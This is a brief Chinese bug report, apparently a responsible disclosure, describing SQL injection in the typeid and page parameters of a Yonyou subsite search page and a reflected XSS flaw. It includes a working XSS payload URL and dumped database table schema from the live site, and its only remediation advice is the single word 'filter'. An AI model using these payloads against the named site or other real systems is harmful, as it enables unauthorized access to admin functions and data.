用友分站SQL注入漏洞,可登录后台
附送反射性XSS一枚
http://aud.yonyou.com/php/search.php?keyword=&page=19&tag=1&total_record=943&typeid=1typeid和page参数存在注入
http://aud.yonyou.com/php/search.php?keyword=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28941058%29%3C%2fScRiPt%3E&page=1&tag=1&total_record=943&typeid=0
这几个参数都存在反射性XSS
Database: ufaud_com
Table: cdb_admingroups
[17 columns]
+-------------------+----------------------+
| Column | Type |
+-------------------+----------------------+
| admingid | smallint(6) unsigned |
| allowbanip | tinyint(1) |
| allowbanuser | tinyint(1) |
| allowcensorword | tinyint(1) |
| allowdelpost | tinyint(1) |
| alloweditpoll | tinyint(1) |
| alloweditpost | tinyint(1) |
| allowedituser | tinyint(1) |
| allowmassprune | tinyint(1) |
| allowmodpost | tinyint(1) |
| allowmoduser | tinyint(1) |
| allowpostannounce | tinyint(1) |
| allowrefund | tinyint(1) |
| allowstickthread | tinyint(1) |
| allowviewip | tinyint(1) |
| allowviewlog | tinyint(1) |
| disablepostctrl | tinyint(1) |
+-------------------+----------------------+
可登录后台
反射型XSS
修复方案:
过滤